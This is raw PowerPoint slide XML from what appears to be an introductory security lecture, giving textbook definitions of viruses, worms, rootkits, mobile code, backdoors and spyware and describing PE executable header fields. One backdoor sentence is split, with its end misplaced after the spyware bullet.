      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1207722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A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="1" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>computer virus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> is a type of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId3" tooltip="Malicious software"/>
              </a:rPr>
              <a:t>malicious software</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> that, when executed, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId4" tooltip="Quine (computing)"/>
              </a:rPr>
              <a:t>replicates</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> itself by modifying other </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId5" tooltip="Computer program"/>
              </a:rPr>
              <a:t>computer programs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> and inserting its own code.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>[1]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> When this replication succeeds, the affected areas are then said to be "infected" with a computer virus.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="1" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>computer worm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> is a standalone </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId7" tooltip="Malware"/>
              </a:rPr>
              <a:t>malware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="120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hlinkClick r:id="rId5" tooltip="Computer program"/>
              </a:rPr>
              <a:t>computer program</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> that replicates itself in order to spread to other computers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="1" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>rootkit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> is a collection of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId8" tooltip="Software"/>
              </a:rPr>
              <a:t>computer software</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>, typically </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId7" tooltip="Malware"/>
              </a:rPr>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>, designed to enable access to a computer or an area of its software that is not otherwise allowed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="1" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Malicious mobile code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>is becoming a popular way to get malware installed on a computer. Malicious mobile code is malware that is obtained from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>remote servers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>transferred across a network</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>, and then </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>downloaded on to your computer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>. This type of code can be transmitted through interactive Web applications such as ActiveX controls, Flash animation, or JavaScript.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="1" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>backdoor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> is a method, often secret, of bypassing normal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId9" tooltip="Authentication"/>
              </a:rPr>
              <a:t>authentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> or encryption in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId10" tooltip="Computer"/>
              </a:rPr>
              <a:t>computer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> system, a product, or an embedded device (e.g. a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId11" tooltip="Home router"/>
              </a:rPr>
              <a:t>home router</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>), or its embodiment, e.g. as part of a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId12" tooltip="Cryptosystem"/>
              </a:rPr>
              <a:t>cryptosystem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>, an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId13" tooltip="Algorithm"/>
              </a:rPr>
              <a:t>algorithm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>, a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId14" tooltip="Chipset"/>
              </a:rPr>
              <a:t>chipset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>, or a "homunculus computer" —a tiny computer-within-a-computer (such as that as found in Intel's </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId15" tooltip="Intel Active Management Technology"/>
              </a:rPr>
              <a:t>AMT technology</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId16"/>
              </a:rPr>
              <a:t>[1]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId17"/>
              </a:rPr>
              <a:t>[2]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> Backdoors are often used for securing remote access to a computer, or obtaining access to </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="1" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Spyware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> is software that aims to gather information about a person or organization, sometimes without their knowledge, that may send such information to another entity without the consumer's consent, that asserts control over a device without the consumer's knowledge, or it may send such information to another entity with the consumer's consent, through cookies .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="30000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId18"/>
              </a:rPr>
              <a:t>[1]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId19" tooltip="Plaintext"/>
              </a:rPr>
              <a:t>plaintext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" u="sng" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:hlinkClick r:id="rId20"/>
              </a:rPr>
              <a:t>cryptographic systems</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{1E03A334-FE4D-4C3E-A61B-575B8EC3A56A}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2949899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1" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Signature </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>is a DWORD(4 bytes) containing the value 50h, 45h, 00h, 00h (“PE” followed by two terminating zeroes).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="1" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>FileHeader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="1" kern="120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(IMAGE_FILE_HEADER) is the next 20 bytes of the PE file and contains info about the physical layout &amp; properties of the file e.g. number of sections.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="1" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>OptionalHeader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="1" kern="120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(IMAGE_OPTIONAL_HEADERS) is always present and forms the next 224 bytes. It contains info about the logical layout inside the PE file with fields like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" i="0" kern="1200" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>AddressOfEntryPoint</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ImageBase</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FileAlignment</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SectionAlignment</a:t>
            </a:r>
            <a:r>
